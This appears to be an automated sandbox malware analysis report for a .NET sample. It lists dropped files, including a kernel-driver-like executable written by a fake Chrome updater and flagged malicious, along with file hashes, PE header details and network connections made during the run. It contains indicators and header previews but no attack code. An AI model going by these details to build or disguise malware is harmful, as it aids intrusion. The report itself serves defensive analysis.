                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.32765835679697
                                                                        Encrypted:false
                                                                        SSDEEP:768:ZZaQL9aHavaLanajaPaTaCaRaEa0aWaKaEaValapaqamaEaFataXaZaVaNada5al:PL
                                                                        MD5:AEA57E77876E4A7F0E2C5C4BCAFC69B1
                                                                        SHA1:E930CDBD8B51DAD1B184C23FAF8A01091C1973D7
                                                                        SHA-256:68BD78CF380327C273E131FA4545E9B9C867555330C2FC364D934A0148FFC7B8
                                                                        SHA-512:A96B44DB0804046D3128C1F44374AA5E718780C1B9DB284CBA79FA67C678673A97A374856F21524B855BD1830FDDE769DDA5799E86C6281D459CD7CAF8ADD74D
                                                                        Malicious:false
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.3642612685419924
                                                                        Encrypted:false
                                                                        SSDEEP:384:dhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ1qXJNXJLJXJxXJBXJfXJKH5:dQ0yUkNYwD8imLEUzL/HXxS
                                                                        MD5:727E32931085339B0D59890FD3759197
                                                                        SHA1:1281993447169E4AF0F4EEDE4F70524D766189F6
                                                                        SHA-256:66D8CFCF522ABCC5813640D9315FB0FC1497236FEBAE41E1095547E137759BFD
                                                                        SHA-512:24BF05FA33772320686E4BD6BF32512DD7BE460393304178292B93E7440B7D198A603C9EB45CCED0479A651C5D752B8E688A207B05E180793D41581E3AACE2FC
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.339319118040676
                                                                        Encrypted:false
                                                                        SSDEEP:384:mh/mcmtmrmsm1mkmQm6m4mnmdmgmsmnmChmxmomMmqmwmHmLmlm9mGmdmpm3mfmP:mNDcxPuxE9KA
                                                                        MD5:F2254833A2ECFC2BE8343C689060E95C
                                                                        SHA1:4E4CE2B2AE58A6A2EFB7D563F17DCBA59A83D2A7
                                                                        SHA-256:A8B52451086D3042E2353D49E565422A083018D22C89F8447889BA77312DEA65
                                                                        SHA-512:38DB34911D61CA2EFE5767C0344BEFF5D81ECEB09B6F7C1F8BC34F0E6F8DEBBB010471A78AA181D4F43941C91AB5C6DFD1D26970AE766E1E208DA776D4FC5FA5
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.7077930323266531
                                                                        Encrypted:false
                                                                        SSDEEP:384:ohK2nl2U52N2h2Ii2wAx2wI2ff2iW2R12Qc2nT2:op
                                                                        MD5:EFAB9CB2241340892CAF25215B175900
                                                                        SHA1:379AAFFC0E9465FBC553A8CD7587F45D07274D24
                                                                        SHA-256:852B282863F4AD8B40A1CB715C9F3EA8B243472EF1D9E95035408AB586EB49BC
                                                                        SHA-512:2702DFE388394AE71F7D2F012E3003F2D3586A5CC2300605D2FF2B14A3F99E4F7443D37203E9EB37101510406C34B6258063807359C31DEDDFE2177ADCB8CBA7
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):3184
                                                                        Entropy (8bit):4.0379871292529
                                                                        Encrypted:false
                                                                        SSDEEP:48:MkJyeZshh/NGUmJfJ4YmqyfBIbAiJfJHyCZmJfJL9yCPHkhJfJf4gboV:NSz/gTRRyfObfRRJmRh9/HkhRGui
                                                                        MD5:F850DE8F3D91F9D9ED2E0BA4C1D7E3DC
                                                                        SHA1:329E64FEDA0487DB45B4ACE9020D36B59A2C43A6
                                                                        SHA-256:D27B8724F81B55FD1FFC4E708D225C72FD2EF41E2A82E9BC3703C0A51765714E
                                                                        SHA-512:B48F960885E9E3D194C2C957AED8799661F54BF37D63B2C4299EA16C27CD5D51E180757655EC5D0EE1A9D55B2149BA8A313907F1AC6CDE2DDEA8C6E22A7D094B
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk, provider strings Microsoft-Windows-WMI-Activity/Operational visible)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.269282050125859
                                                                        Encrypted:false
                                                                        SSDEEP:384:Vhghshy2h0hEhDh9vhghp6hXghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLha8:VbsFpkBSqL8wD
                                                                        MD5:A58CC6DEC3C876BEEC16907FC49E19BA
                                                                        SHA1:C2617D099C46BD902D85BD8FE90FC6F34995BA5A
                                                                        SHA-256:BE9A153D8CFAB9F25D94444C14641599D6F8C868DB9675D3FA330E0C7C0110A6
                                                                        SHA-512:4311D7F2C987CCE1F5EE8F78B867A87BFDE8D5E28C996B2BF1347B41063F38B6CB98BE968A962064C5920B9F355AA537FE5370FB78D52C69F5B81B279C394D5D
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.2593916356001515
                                                                        Encrypted:false
                                                                        SSDEEP:384:ahOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOV5VqVFlVmV8VVG:ayjbS
                                                                        MD5:14652E4148A13AE019B3CF2CC20B5812
                                                                        SHA1:0D6C33AC1CF9CF3EDB3B4632A0943BC7ED7521FC
                                                                        SHA-256:3946831B472B0248BBBB225A2253A26A693E9155C3FFF0D8CE29897E07573134
                                                                        SHA-512:0306DB2CBFEB878570FF4B4342CD6E89B056D9FE7E41029CE17FD08953749351EB65C8B942D36EB7842F6167219997D876270DC0B5528F4FFC13EB310B8F0324
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 101, DIRTY
                                                                        Category:dropped
                                                                        Size (bytes):129944
                                                                        Entropy (8bit):4.193933238266943
                                                                        Encrypted:false
                                                                        SSDEEP:768:rL5v0NuJKOXvb6mBylNGkVdNWN/3kUbzVVRa6vwVQldASo0RXk9gjdkINbRkmkb8:JhBlXhBl
                                                                        MD5:D5A6BC6D8DDE44574DE4EC24E2526D8F
                                                                        SHA1:7E05C32C7047010EE573E8954449768F0CE82CC2
                                                                        SHA-256:FD693AB0DC6BAEF3572ACF7F64AA75F91F434D8343BED199CA18287DB8416EDF
                                                                        SHA-512:0E77B86DCAFD8446783245822EE3C00261F5C7166CD2EE4E30323AC8305F3D5B4FA1E3D98DF64AC9DA93E79B7A3CB2BA2755785E8B8A491DEFD5AAC80AC24743
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX file header ElfFile followed by an ElfChnk chunk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.321255744338126
                                                                        Encrypted:false
                                                                        SSDEEP:384:nh4BwBxNqObx1rBwBwQtBwBnp+/0JBwBc/wBwBwtBwBwUBwBAszBwB1BwB2WBwBc:n/NqObx/lsKeQfcjDsM
                                                                        MD5:A3669CF64CFD0978933A9CC3482C1282
                                                                        SHA1:E6FCB91617D5FD48E2183A9A02D5709171997FBA
                                                                        SHA-256:2DEB30BC8AB788088A11EDA733F655F2585FDA14ABFEABFBCF56D3974F6DB2EA
                                                                        SHA-512:28C0C0ECF5A21920611FB6E0120A2A4D778E4E47CB22976D16FDB02DB38A78C21B60F3544D111D99A813E284D40FF998B63A995786EC8D9C85793B8B3961107F
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.396202402379334
                                                                        Encrypted:false
                                                                        SSDEEP:384:IMh4UEiUEfUE5UE0UEfUEtUEpUEAUELUEvUEcUEJUEBUE3UEHUERUExUEeUEaUEW:voHgSNX8+BoUYUkIO
                                                                        MD5:838CCFDA7EEB847C3F96507592B3480B
                                                                        SHA1:1D1C0CA6AFCCC861AFB6B7D2BD500657CC139AC7
                                                                        SHA-256:2E474ECD1D96758EA0BD52D3C594998DFC30DCB83270638B107B41B81FB51339
                                                                        SHA-512:59156BC3267CABA12BB8F542EF10E409F0E685731E8C916681457C9376B36A84DB13B29F006C049528E1E78D63168B9C4B521088FB08445F208432BBDC0EC749
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.405570226034379
                                                                        Encrypted:false
                                                                        SSDEEP:384:9FRTB4ovbJlojdu6wpoCjojdHojdwo3QxuojdYwvioazojd3ojdlo3Cojd7oDCoz:f3Ixu8W398Q4D2W
                                                                        MD5:F7AD77DB388F97B27D62F568A3373631
                                                                        SHA1:71655A30CAC99D8F75767AF735B5C9E7B45F9995
                                                                        SHA-256:F0739019E0DEA9301F8D5B1847964D7E86B6B2942D1381148874592DACE37287
                                                                        SHA-512:80CD91B88A5FA487E90318391CC54EAD726826D2B304A9D7D7F49B69A1029A87B95450A307C3F05C7348CFA1E606DF149EF4515B8D4D0312DD95947367FBE493
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk, provider string Microsoft-Windows-Eventlog visible)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):68440
                                                                        Entropy (8bit):0.47896393707770835
                                                                        Encrypted:false
                                                                        SSDEEP:96:aNVaO8Joax8SRO208w52rNVaO8Joax8SRO208w52:MV701RC6V701RC
                                                                        MD5:4C980E3386B6256C0B4AC1D9BCE24073
                                                                        SHA1:8124C01A189C8294A8883C57433382CA745D9154
                                                                        SHA-256:32EEEDC2433514DA8E490D932A309A86598896346093B281A3C2FD59EDE6F4F9
                                                                        SHA-512:A82D4FD43325C38FB8F3DD55D8674985335EBBC289B0CDBC1CCFC430F24FFA64666695B9F25B81C212014A47A6BD47D578901616AEDD869316D2BDE4F47ABDE9
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4464
                                                                        Entropy (8bit):4.313558294414202
                                                                        Encrypted:false
                                                                        SSDEEP:96:cFRgRhRNrR2XxDJ6x6ojygxSr58yYvtJl7s/L:GGXfr6xJ6bDY+LxGL
                                                                        MD5:D9FAB8A318569AAE314504E9DA614B74
                                                                        SHA1:A4099ACBD7DF7A3D9F669E5B40DFD494907FE5D4
                                                                        SHA-256:1A9EAB0791FE35348C0114B4E1938DADC9E42407BF0FEDE4EC9BB293DE507EEA
                                                                        SHA-512:96050F019F8FBEA311E90536CF282AA4C42B6C26C25CF5E1EF6B74DD8A0B095CE5BC3FEF1F2D822A5784760CCF7DA365734DA524CE410BC24B67126265D61D32
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk, provider string Microsoft-Windows-UserModePowerService and path C:\Windows\System32\powercfg.exe visible)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):97040
                                                                        Entropy (8bit):3.8210585008824354
                                                                        Encrypted:false
                                                                        SSDEEP:1536:6E89VtMUjtli/TwE0Js7RMFE89VtMUjtli/TwE0Js7RMyMmYirZOZ2c1R0uXbiws:
                                                                        MD5:9C67A408A72171431BD77A8051D4016E
                                                                        SHA1:60D1B2933586976E566BB4DD3FC8DDF24AB094E1
                                                                        SHA-256:5E2D68BEB621E9014579E0A5ABFCEE98E89F2CB009305D692D4768450C18854B
                                                                        SHA-512:E6E37523CC13FF8BECA16C53E5C0847C5C8F71D578ADCAD795220FBF4E25C0F304E211AA0BC5F767AE6951E17AC08A87A961DC16C71252A3A0FC2110DE2D8772
                                                                        Malicious:false
                                                                         Preview:(raw binary dump omitted; starts with the EVTX chunk signature ElfChnk, provider string PowerShell visible)
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Note:this 60-byte file is the probe script (normally named __PSScriptPolicyTest_<random>.ps1) that powershell.exe writes to the user's temp directory every time it starts, to test whether AppLocker would block script execution. It is a benign side effect of launching PowerShell; each identical entry listed here corresponds to one powershell.exe start during the analysis. The security-relevant fact is the PowerShell activity itself, not this file's content.
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\ProgramData\Google\Chrome\updater.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Note:a "native" subsystem image with an INIT section (visible in the preview below) has the layout of a Windows kernel-mode driver, not of a user-mode program. It is written by the updater.exe process, which itself runs from a ProgramData path styled after Google Chrome's updater; Joe Sandbox marks the file malicious and ReversingLabs reports a 5% engine detection rate.
                                                                        Category:dropped
                                                                        Size (bytes):14544
                                                                        Entropy (8bit):6.2660301556221185
                                                                        Encrypted:false
                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View (other analyses in which a file with this hash appeared):
• Filename: Loader.exe, Detection: malicious
• Filename: updater.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Laun3cher_E@zy.exe, Detection: malicious
• Filename: daRNfwifay.exe, Detection: malicious
• Filename: cherax.exe, Detection: malicious
• Filename: K4gsPJGEi4.exe, Detection: malicious
• Filename: 32Vec0G7f5.exe, Detection: malicious
• Filename: BZMxi2zof1.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3444
                                                                        Entropy (8bit):5.011954215267298
                                                                        Encrypted:false
                                                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                        MD5:B133A676D139032A27DE3D9619E70091
                                                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                        Malicious:false
                                                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):48786
                                                                        Entropy (8bit):3.5854495362228453
                                                                        Encrypted:false
                                                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                        Malicious:false
                                                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):5.57409878988691
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        File size:38'400 bytes
                                                                        MD5:1547e40089b1b06c2e27658c4f478466
                                                                        SHA1:b531e9eaeb0f3e606635623d0775b94e2da113a9
                                                                        SHA256:62133bf304c2143af08217ea5caa1102009e3f70682896ae2997b232f212ec51
                                                                        SHA512:84dadeb9adbd6d0d48924759a507f30410f6719b0e1e436be5cbea579417de7e31a13725829a1d5709b2cbb4edebbb060cd8053e084f2c1e475f0d43232e3922
                                                                        SSDEEP:768:DBjFST01npxFX4ZQXJXbOfq1GkgqskxSgsqG9br:D1XpxFX4ZQlbOmgoSgsqWr
                                                                        TLSH:27032A18A77AC01BD1AFCE7928D9063156319172261FF7A30EC856EFDA937404A07BE3
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{b............................N.... ........@.. ....................................@................................
                                                                        Icon Hash:00928e8e8686b000
                                                                        Entrypoint:0x40ab4e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x627B0FDD [Wed May 11 01:22:37 2022 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (this line repeats 97 times in the original listing: the disassembler is decoding the 0x00 padding that follows the stub, not code)
Note:the entry point is the standard 6-byte native stub of a .NET executable. It jumps through the single IAT slot at RVA 0x2000 (IMAGE_DIRECTORY_ENTRY_IAT, size 8, in the data directory table below) to the only import this file has, mscoree.dll!_CorExeMain, which loads the CLR and runs the managed entry point described by the COM descriptor (CLR header) at RVA 0x2008. There is no native code of interest in this binary; its behaviour is in the IL.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaafc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x488 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8b54 | 0x8c00 | 291b9509545054b83d9500079d4081af | False | 0.46414620535714285 | data | 5.716835242247517 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x488 | 0x600 | ba5c03d32cd0108f9297397c43d2a9c2 | False | 0.349609375 | data | 3.41440845450297 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 7e0315074e9e090673891d2da6a565d3 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x24c | data | | | 0.4642857142857143
RT_MANIFEST | 0xc2f0 | 0x193 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5732009925558312

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 14, 2024 23:41:31.535439968 CEST | 49727 | 443 | 192.168.2.5 | 140.82.121.3
Jul 14, 2024 23:41:31.535485983 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
Jul 14, 2024 23:41:31.535609007 CEST | 49727 | 443 | 192.168.2.5 | 140.82.121.3
Jul 14, 2024 23:41:31.545629978 CEST | 49727 | 443 | 192.168.2.5 | 140.82.121.3
Jul 14, 2024 23:41:31.545656919 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
Jul 14, 2024 23:41:32.196645975 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
Jul 14, 2024 23:41:32.196748972 CEST | 49727 | 443 | 192.168.2.5 | 140.82.121.3
Jul 14, 2024 23:41:32.200697899 CEST | 49727 | 443 | 192.168.2.5 | 140.82.121.3
Jul 14, 2024 23:41:32.200721025 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
Jul 14, 2024 23:41:32.201013088 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
Jul 14, 2024 23:41:32.213301897 CEST | 49727 | 443 | 192.168.2.5 | 140.82.121.3
Jul 14, 2024 23:41:32.256510019 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
Jul 14, 2024 23:41:32.605201960 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
Jul 14, 2024 23:41:32.605392933 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
Jul 14, 2024 23:41:32.605472088 CEST | 49727 | 443 | 192.168.2.5 | 140.82.121.3
Jul 14, 2024 23:41:32.605487108 CEST | 443 | 49727 | 140.82.121.3 | 192.168.2.5
